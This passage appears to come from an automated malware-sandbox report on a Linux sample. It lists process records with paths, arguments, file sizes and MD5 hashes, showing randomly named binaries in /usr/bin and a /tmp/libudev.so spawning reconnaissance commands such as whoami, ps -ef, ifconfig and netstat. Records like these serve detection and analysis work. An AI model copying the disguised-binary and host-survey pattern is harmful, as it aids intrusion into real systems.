                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:21
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/hrrmkhkkhv
                                                                                                                                          Arguments:/usr/bin/hrrmkhkkhv su 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:d3379066576970eab5be5293801f397c

                                                                                                                                          Start time:18:45:21
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/hrrmkhkkhv
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:d3379066576970eab5be5293801f397c

                                                                                                                                          Start time:18:45:26
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:26
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:26
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/cuwlelaebc
                                                                                                                                          Arguments:/usr/bin/cuwlelaebc "echo \"find\"" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:cc56c8f5e3b21e31509e1f361dd133f0

                                                                                                                                          Start time:18:45:26
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/cuwlelaebc
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:cc56c8f5e3b21e31509e1f361dd133f0

                                                                                                                                          Start time:18:45:26
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:26
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:26
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/cuwlelaebc
                                                                                                                                          Arguments:/usr/bin/cuwlelaebc "ps -ef" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:cc56c8f5e3b21e31509e1f361dd133f0

                                                                                                                                          Start time:18:45:26
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/cuwlelaebc
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:cc56c8f5e3b21e31509e1f361dd133f0

                                                                                                                                          Start time:18:45:26
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:26
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:26
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/cuwlelaebc
                                                                                                                                          Arguments:/usr/bin/cuwlelaebc whoami 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:cc56c8f5e3b21e31509e1f361dd133f0

                                                                                                                                          Start time:18:45:26
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/cuwlelaebc
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:cc56c8f5e3b21e31509e1f361dd133f0

                                                                                                                                          Start time:18:45:26
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:26
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:26
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/cuwlelaebc
                                                                                                                                          Arguments:/usr/bin/cuwlelaebc whoami 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:cc56c8f5e3b21e31509e1f361dd133f0

                                                                                                                                          Start time:18:45:26
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/cuwlelaebc
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:cc56c8f5e3b21e31509e1f361dd133f0

                                                                                                                                          Start time:18:45:26
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:26
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:26
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/cuwlelaebc
                                                                                                                                          Arguments:/usr/bin/cuwlelaebc whoami 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:cc56c8f5e3b21e31509e1f361dd133f0

                                                                                                                                          Start time:18:45:26
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/cuwlelaebc
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:cc56c8f5e3b21e31509e1f361dd133f0

                                                                                                                                          Start time:18:45:31
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:31
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:31
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/zpxsvbblcg
                                                                                                                                          Arguments:/usr/bin/zpxsvbblcg "grep \"A\"" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:70ebe03fd6dcf93b8a9c51c469cb3b54

                                                                                                                                          Start time:18:45:31
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/zpxsvbblcg
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:70ebe03fd6dcf93b8a9c51c469cb3b54

                                                                                                                                          Start time:18:45:32
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:32
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:32
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/zpxsvbblcg
                                                                                                                                          Arguments:/usr/bin/zpxsvbblcg su 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:70ebe03fd6dcf93b8a9c51c469cb3b54

                                                                                                                                          Start time:18:45:32
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/zpxsvbblcg
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:70ebe03fd6dcf93b8a9c51c469cb3b54

                                                                                                                                          Start time:18:45:32
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:32
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:32
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/zpxsvbblcg
                                                                                                                                          Arguments:/usr/bin/zpxsvbblcg "ls -la" 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:70ebe03fd6dcf93b8a9c51c469cb3b54

                                                                                                                                          Start time:18:45:32
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/zpxsvbblcg
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:70ebe03fd6dcf93b8a9c51c469cb3b54

                                                                                                                                          Start time:18:45:32
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:32
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:32
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/zpxsvbblcg
                                                                                                                                          Arguments:/usr/bin/zpxsvbblcg who 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:70ebe03fd6dcf93b8a9c51c469cb3b54

                                                                                                                                          Start time:18:45:32
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/zpxsvbblcg
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:70ebe03fd6dcf93b8a9c51c469cb3b54

                                                                                                                                          Start time:18:45:32
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:32
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:32
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/zpxsvbblcg
                                                                                                                                          Arguments:/usr/bin/zpxsvbblcg bash 6231
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:70ebe03fd6dcf93b8a9c51c469cb3b54

                                                                                                                                          Start time:18:45:32
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/zpxsvbblcg
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625878 bytes
                                                                                                                                          MD5 hash:70ebe03fd6dcf93b8a9c51c469cb3b54

                                                                                                                                          Start time:18:45:37
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:37
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:37
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/ockerbcjas
                                                                                                                                          Arguments:/usr/bin/ockerbcjas "ps -ef" 6231
                                                                                                                                          File size:625889 bytes
                                                                                                                                          MD5 hash:426eab97bd927ff91d797d8db1c47c99

                                                                                                                                          Start time:18:45:37
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/ockerbcjas
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625889 bytes
                                                                                                                                          MD5 hash:426eab97bd927ff91d797d8db1c47c99

                                                                                                                                          Start time:18:45:37
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:37
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:37
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/ockerbcjas
                                                                                                                                          Arguments:/usr/bin/ockerbcjas "route -n" 6231
                                                                                                                                          File size:625889 bytes
                                                                                                                                          MD5 hash:426eab97bd927ff91d797d8db1c47c99

                                                                                                                                          Start time:18:45:37
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/ockerbcjas
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625889 bytes
                                                                                                                                          MD5 hash:426eab97bd927ff91d797d8db1c47c99

                                                                                                                                          Start time:18:45:37
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:37
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:37
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/ockerbcjas
                                                                                                                                          Arguments:/usr/bin/ockerbcjas "ls -la" 6231
                                                                                                                                          File size:625889 bytes
                                                                                                                                          MD5 hash:426eab97bd927ff91d797d8db1c47c99

                                                                                                                                          Start time:18:45:37
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/ockerbcjas
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625889 bytes
                                                                                                                                          MD5 hash:426eab97bd927ff91d797d8db1c47c99

                                                                                                                                          Start time:18:45:37
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:37
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:37
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/ockerbcjas
                                                                                                                                          Arguments:/usr/bin/ockerbcjas id 6231
                                                                                                                                          File size:625889 bytes
                                                                                                                                          MD5 hash:426eab97bd927ff91d797d8db1c47c99

                                                                                                                                          Start time:18:45:37
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/ockerbcjas
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625889 bytes
                                                                                                                                          MD5 hash:426eab97bd927ff91d797d8db1c47c99

                                                                                                                                          Start time:18:45:37
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:37
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:37
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/ockerbcjas
                                                                                                                                          Arguments:/usr/bin/ockerbcjas "ls -la" 6231
                                                                                                                                          File size:625889 bytes
                                                                                                                                          MD5 hash:426eab97bd927ff91d797d8db1c47c99

                                                                                                                                          Start time:18:45:37
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/ockerbcjas
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625889 bytes
                                                                                                                                          MD5 hash:426eab97bd927ff91d797d8db1c47c99

                                                                                                                                          Start time:18:45:42
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:42
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:42
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/xtzjojyyzf
                                                                                                                                          Arguments:/usr/bin/xtzjojyyzf sh 6231
                                                                                                                                          File size:625889 bytes
                                                                                                                                          MD5 hash:526c1c9eb7c1e1cfc18ada8d78efe0b4

                                                                                                                                          Start time:18:45:42
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/xtzjojyyzf
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625889 bytes
                                                                                                                                          MD5 hash:526c1c9eb7c1e1cfc18ada8d78efe0b4

                                                                                                                                          Start time:18:45:42
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:42
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:42
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/xtzjojyyzf
                                                                                                                                          Arguments:/usr/bin/xtzjojyyzf "grep \"A\"" 6231
                                                                                                                                          File size:625889 bytes
                                                                                                                                          MD5 hash:526c1c9eb7c1e1cfc18ada8d78efe0b4

                                                                                                                                          Start time:18:45:42
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/xtzjojyyzf
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625889 bytes
                                                                                                                                          MD5 hash:526c1c9eb7c1e1cfc18ada8d78efe0b4

                                                                                                                                          Start time:18:45:42
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:42
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:42
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/xtzjojyyzf
                                                                                                                                          Arguments:/usr/bin/xtzjojyyzf ifconfig 6231
                                                                                                                                          File size:625889 bytes
                                                                                                                                          MD5 hash:526c1c9eb7c1e1cfc18ada8d78efe0b4

                                                                                                                                          Start time:18:45:42
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/xtzjojyyzf
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625889 bytes
                                                                                                                                          MD5 hash:526c1c9eb7c1e1cfc18ada8d78efe0b4

                                                                                                                                          Start time:18:45:42
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:42
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:42
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/xtzjojyyzf
                                                                                                                                          Arguments:/usr/bin/xtzjojyyzf "sleep 1" 6231
                                                                                                                                          File size:625889 bytes
                                                                                                                                          MD5 hash:526c1c9eb7c1e1cfc18ada8d78efe0b4

                                                                                                                                          Start time:18:45:42
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/xtzjojyyzf
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625889 bytes
                                                                                                                                          MD5 hash:526c1c9eb7c1e1cfc18ada8d78efe0b4

                                                                                                                                          Start time:18:45:42
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:42
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:42
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/xtzjojyyzf
                                                                                                                                          Arguments:/usr/bin/xtzjojyyzf "ifconfig eth0" 6231
                                                                                                                                          File size:625889 bytes
                                                                                                                                          MD5 hash:526c1c9eb7c1e1cfc18ada8d78efe0b4

                                                                                                                                          Start time:18:45:42
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/xtzjojyyzf
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625889 bytes
                                                                                                                                          MD5 hash:526c1c9eb7c1e1cfc18ada8d78efe0b4

                                                                                                                                          Start time:18:45:47
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:47
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:47
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/blrhrkypbo
                                                                                                                                          Arguments:/usr/bin/blrhrkypbo whoami 6231
                                                                                                                                          File size:625889 bytes
                                                                                                                                          MD5 hash:d2d6dfe69121e1075ca6077e908ab83f

                                                                                                                                          Start time:18:45:47
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/blrhrkypbo
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625889 bytes
                                                                                                                                          MD5 hash:d2d6dfe69121e1075ca6077e908ab83f

                                                                                                                                          Start time:18:45:47
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:47
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:47
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/blrhrkypbo
                                                                                                                                          Arguments:/usr/bin/blrhrkypbo "netstat -an" 6231
                                                                                                                                          File size:625889 bytes
                                                                                                                                          MD5 hash:d2d6dfe69121e1075ca6077e908ab83f

                                                                                                                                          Start time:18:45:47
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/blrhrkypbo
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625889 bytes
                                                                                                                                          MD5 hash:d2d6dfe69121e1075ca6077e908ab83f

                                                                                                                                          Start time:18:45:47
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:47
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:47
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/blrhrkypbo
                                                                                                                                          Arguments:/usr/bin/blrhrkypbo uptime 6231
                                                                                                                                          File size:625889 bytes
                                                                                                                                          MD5 hash:d2d6dfe69121e1075ca6077e908ab83f

                                                                                                                                          Start time:18:45:47
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/blrhrkypbo
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625889 bytes
                                                                                                                                          MD5 hash:d2d6dfe69121e1075ca6077e908ab83f

                                                                                                                                          Start time:18:45:47
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:47
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:47
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/blrhrkypbo
                                                                                                                                          Arguments:/usr/bin/blrhrkypbo id 6231
                                                                                                                                          File size:625889 bytes
                                                                                                                                          MD5 hash:d2d6dfe69121e1075ca6077e908ab83f

                                                                                                                                          Start time:18:45:47
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/blrhrkypbo
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625889 bytes
                                                                                                                                          MD5 hash:d2d6dfe69121e1075ca6077e908ab83f

                                                                                                                                          Start time:18:45:47
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:47
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/tmp/libudev.so
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625867 bytes
                                                                                                                                          MD5 hash:7dc92a289a05c45d4179a322344ad09c

                                                                                                                                          Start time:18:45:47
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/blrhrkypbo
                                                                                                                                          Arguments:/usr/bin/blrhrkypbo top 6231
                                                                                                                                          File size:625889 bytes
                                                                                                                                          MD5 hash:d2d6dfe69121e1075ca6077e908ab83f

                                                                                                                                          Start time:18:45:47
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/bin/blrhrkypbo
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:625889 bytes
                                                                                                                                          MD5 hash:d2d6dfe69121e1075ca6077e908ab83f

                                                                                                                                          Start time:18:43:49
                                                                                                                                          Start date:09/07/2022
                                                                                                                                          Path:/usr/lib/systemd/systemd
                                                                                                                                          Arguments:n/a
                                                                                                                                          File size:1620224 bytes
